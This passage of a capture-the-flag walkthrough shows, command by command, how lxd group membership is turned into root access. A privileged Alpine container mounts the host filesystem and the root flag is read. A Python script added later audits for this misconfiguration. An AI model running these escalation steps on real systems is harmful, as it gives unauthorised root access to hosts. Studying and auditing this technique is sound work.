Error: unknown command "import" for "lxc"
Run 'lxc --help' for usage.
cheran@ubuntu:/tmp$ lxc image import ./alpine-v3.13-x86_64-20210218_0139.tar.gz --alias myimage
If this is your first time running LXD on this machine, you should also run: lxd init
To start your first container, try: lxc launch ubuntu:18.04
Image imported with fingerprint: cd73881adaac667ca3529972c7b380af240a9e3b09730f8c8e4e6a23e1a7892b
cheran@ubuntu:/tmp$ lxc image list
+---------+--------------+--------+-------------------------------+--------+--------+------------------------------+
| ALIAS | FINGERPRINT | PUBLIC | DESCRIPTION | ARCH | SIZE | UPLOAD DATE |
+---------+--------------+--------+-------------------------------+--------+--------+------------------------------+
| myimage | cd73881adaac | no | alpine v3.13 (20210218_01:39) | x86_64 | 3.11MB | Jan 31, 2023 at 4:30am (UTC) |
+---------+--------------+--------+-------------------------------+--------+--------+------------------------------+
cheran@ubuntu:/tmp$ lxc init myimage ignite -c security.privileged=true
Creating ignite
Error: No storage pool found. Please create a new storage pool
cheran@ubuntu:/tmp$ lxd init
Would you like to use LXD clustering? (yes/no) [default=no]:
Do you want to configure a new storage pool? (yes/no) [default=yes]:
Name of the new storage pool [default=default]:
Name of the storage backend to use (btrfs, dir, lvm) [default=btrfs]:
Create a new BTRFS pool? (yes/no) [default=yes]:
Would you like to use an existing block device? (yes/no) [default=no]:
Size in GB of the new loop device (1GB minimum) [default=15GB]:
Would you like to connect to a MAAS server? (yes/no) [default=no]:
Would you like to create a new local network bridge? (yes/no) [default=yes]:
What should the new bridge be called? [default=lxdbr0]:
What IPv4 address should be used? (CIDR subnet notation, “auto” or “none”) [default=auto]:
What IPv6 address should be used? (CIDR subnet notation, “auto” or “none”) [default=auto]:
Would you like LXD to be available over the network? (yes/no) [default=no]:
Would you like stale cached images to be updated automatically? (yes/no) [default=yes]
Would you like a YAML "lxd init" preseed to be printed? (yes/no) [default=no]:
cheran@ubuntu:/tmp$ lxc init myimage ignite -c security.privileged=true
Creating ignite
cheran@ubuntu:/tmp$ lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
Device mydevice added to ignite
cheran@ubuntu:/tmp$ lxc start ignite
cheran@ubuntu:/tmp$ lxc exec ignite /bin/sh
~ # cd /mnt/root
/mnt/root # ls -alh
total 473M
drwxr-xr-x 23 root root 4.0K Jul 29 2020 .
drwxr-xr-x 1 root root 8 Jan 31 04:32 ..
drwxr-xr-x 2 root root 4.0K Jul 29 2020 bin
drwxr-xr-x 3 root root 4.0K Jul 29 2020 boot
drwxr-xr-x 18 root root 3.8K Jan 31 02:46 dev
drwxr-xr-x 98 root root 4.0K Jan 31 02:47 etc
drwxr-xr-x 4 root root 4.0K Jul 29 2020 home
lrwxrwxrwx 1 root root 34 Jul 29 2020 initrd.img -> boot/initrd.img-4.15.0-112-generic
lrwxrwxrwx 1 root root 34 Jul 29 2020 initrd.img.old -> boot/initrd.img-4.15.0-112-generic
drwxr-xr-x 22 root root 4.0K Jul 29 2020 lib
drwxr-xr-x 2 root root 4.0K Jul 29 2020 lib64
drwx------ 2 root root 16.0K Jul 29 2020 lost+found
drwxr-xr-x 2 root root 4.0K Jul 29 2020 media
drwxr-xr-x 2 root root 4.0K Jul 29 2020 mnt
drwxr-xr-x 2 root root 4.0K Jul 29 2020 opt
dr-xr-xr-x 143 root root 0 Jan 31 02:46 proc
drwx------ 3 root root 4.0K Jul 29 2020 root
drwxr-xr-x 27 root root 940 Jan 31 04:31 run
drwxr-xr-x 2 root root 12.0K Jul 29 2020 sbin
drwxr-xr-x 2 root root 4.0K Jul 29 2020 snap
drwxr-xr-x 2 root root 4.0K Jul 29 2020 srv
-rw------- 1 root root 472.5M Jul 29 2020 swapfile
dr-xr-xr-x 13 root root 0 Jan 31 02:46 sys
drwxrwxrwt 11 root root 4.0K Jan 31 04:30 tmp
drwxr-xr-x 10 root root 4.0K Jul 29 2020 usr
drwxr-xr-x 14 root root 4.0K Jul 29 2020 var
lrwxrwxrwx 1 root root 31 Jul 29 2020 vmlinuz -> boot/vmlinuz-4.15.0-112-generic
lrwxrwxrwx 1 root root 31 Jul 29 2020 vmlinuz.old -> boot/vmlinuz-4.15.0-112-generic
/mnt/root # cd root
/mnt/root/root # ls -alh
total 28K
drwx------ 3 root root 4.0K Jul 29 2020 .
drwxr-xr-x 23 root root 4.0K Jul 29 2020 ..
-rw-r--r-- 1 root root 3.0K Apr 9 2018 .bashrc
drwxr-xr-x 3 root root 4.0K Jul 29 2020 .local
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw------- 1 root root 849 Jul 29 2020 .viminfo
-rw-r--r-- 1 root 1001 2.2K Jul 29 2020 root.txt
/mnt/root/root # cat root.txt
Bow & Arrow (/,**
%%/ /***********/(.Cheran Flag.)/*******////*/*
/(,, /*****/((((//******/ //
/(, .,, /(
/(, */, /
(#, , ,,, ./
(# , ,,, //
(# .. ,,, /(
## .(,,,,,,,,,,,,,,, /,
## * ,, *.
## , ,, *
## * .,,, /*
## **, /*
#% ,, *****
#% **, .*****************,
#%*.
%% Congrats...
##
##
#( Here is the Flag...
#*
.#*
.(* Share your screenshot in telegram : https://t.me/joinchat/N06BGRSyCLUnOBsONd9fxg
*
/mnt/root/root #
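The escalation above works because membership of the lxd group is effectively root: a container created with security.privileged=true plus a disk device whose source is / gives an unconfined root view of the host filesystem, which is exactly what the listing of /mnt/root/root shows. The block below is an added example, not from the original post, of how a defender would audit for both conditions: it reads container-admin group membership from /etc/group content and parses the YAML that `lxc config show <name> --expanded` prints, looking for the privileged flag and for disk devices that expose the host root. The /etc/group excerpt and the config output are constructed samples modelled on the session above, and the parser handles only the flat, two-space-indented mapping subset that lxc emits (list items are skipped).

```python
# Constructed /etc/group excerpt modelled on the `id` output above (not the target's real file).
SAMPLE_ETC_GROUP = """\
root:x:0:
adm:x:4:syslog,cheran
sudo:x:27:cheran
lxd:x:108:cheran
sambashare:x:115:cheran
"""

# Constructed output in the shape of `lxc config show ignite --expanded` for the container
# built above: privileged, with the host root mounted at /mnt/root.
SAMPLE_CONFIG_SHOW = """\
architecture: x86_64
config:
  image.architecture: x86_64
  image.description: alpine v3.13 (20210218_01:39)
  security.privileged: "true"
devices:
  mydevice:
    path: /mnt/root
    recursive: "true"
    source: /
    type: disk
  root:
    path: /
    pool: default
    type: disk
ephemeral: false
profiles:
- default
stateful: false
description: ""
"""

# A container that only carries the default root disk from its profile (constructed).
SAFE_CONFIG_SHOW = """\
architecture: x86_64
config:
  image.architecture: x86_64
devices:
  root:
    path: /
    pool: default
    type: disk
ephemeral: false
profiles:
- default
"""

CONTAINER_ADMIN_GROUPS = ("lxd", "docker")


def group_members(etc_group_text, groups=CONTAINER_ADMIN_GROUPS):
    """Map each container-admin group present in /etc/group content to its member list."""
    members = {}
    for line in etc_group_text.splitlines():
        fields = line.split(":")
        if len(fields) == 4 and fields[0] in groups:
            members[fields[0]] = [m for m in fields[3].split(",") if m]
    return members


def parse_simple_yaml(text):
    """Parse the two-space-indented key/value mapping subset of YAML that lxc emits.

    Quoted scalars are unquoted; list items ("- x") are skipped because the audit
    does not need them. This is deliberately not a general YAML parser.
    """
    root = {}
    stack = [(-1, root)]  # (indent level, mapping currently being filled)
    for raw in text.splitlines():
        if not raw.strip() or raw.lstrip().startswith(("#", "- ")):
            continue
        indent = len(raw) - len(raw.lstrip(" "))
        key, _, value = raw.strip().partition(":")
        value = value.strip()
        while stack[-1][0] >= indent:          # close mappings that are deeper than this line
            stack.pop()
        parent = stack[-1][1]
        if value == "":                         # "key:" with nothing after it opens a nested mapping
            child = {}
            parent[key] = child
            stack.append((indent, child))
        else:
            parent[key] = value.strip('"')
    return root


def audit_container(name, config_show_text):
    """Flag a privileged container and any disk device whose source is the host root."""
    cfg = parse_simple_yaml(config_show_text)
    findings = []
    if cfg.get("config", {}).get("security.privileged", "false").lower() == "true":
        findings.append(f"{name}: security.privileged=true (container root maps to host root)")
    for dev, props in cfg.get("devices", {}).items():
        if isinstance(props, dict) and props.get("type") == "disk" and props.get("source") == "/":
            findings.append(f"{name}: disk device '{dev}' exposes host / at {props.get('path')}")
    return findings


if __name__ == "__main__":
    print("container-admin group members:", group_members(SAMPLE_ETC_GROUP))
    for finding in audit_container("ignite", SAMPLE_CONFIG_SHOW):
        print(finding)
```

The practical fix is to remove non-administrators from the lxd group and to treat lxd or docker membership as equivalent to unrestricted sudo in access reviews; the container-side checks catch an escalation that has already been set up, which is also a useful incident-response artefact.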
The initial lxc privilege escalation failed mainly because the -i option was omitted when switching users with sudo.
┌──(kali㉿kali)-[~/Toolsets]
└─$ man sudo | grep -e '-i'
[-T timeout] [-u user] [VAR=value] [-i | -s] [command]
-i, --login
manual documents how the -i option affects the environment in which a command is run when the sudoers
-n, --non-interactive
MAIL Set to the mail spool of the target user when the -i option is specified, or when env_reset is en‐
HOME Set to the home directory of the target user when the -i or -H options are specified, when the -s
LOGNAME Set to the login name of the target user when the -i option is specified, when the set_logname op‐
Lessons learned
- Because the target VM's network mode was set to host-only, the key clue planted by the author could not be retrieved (it requires internet access).
- When switching users with sudo, the -i (login) option may be needed so that the target user's environment variables are set.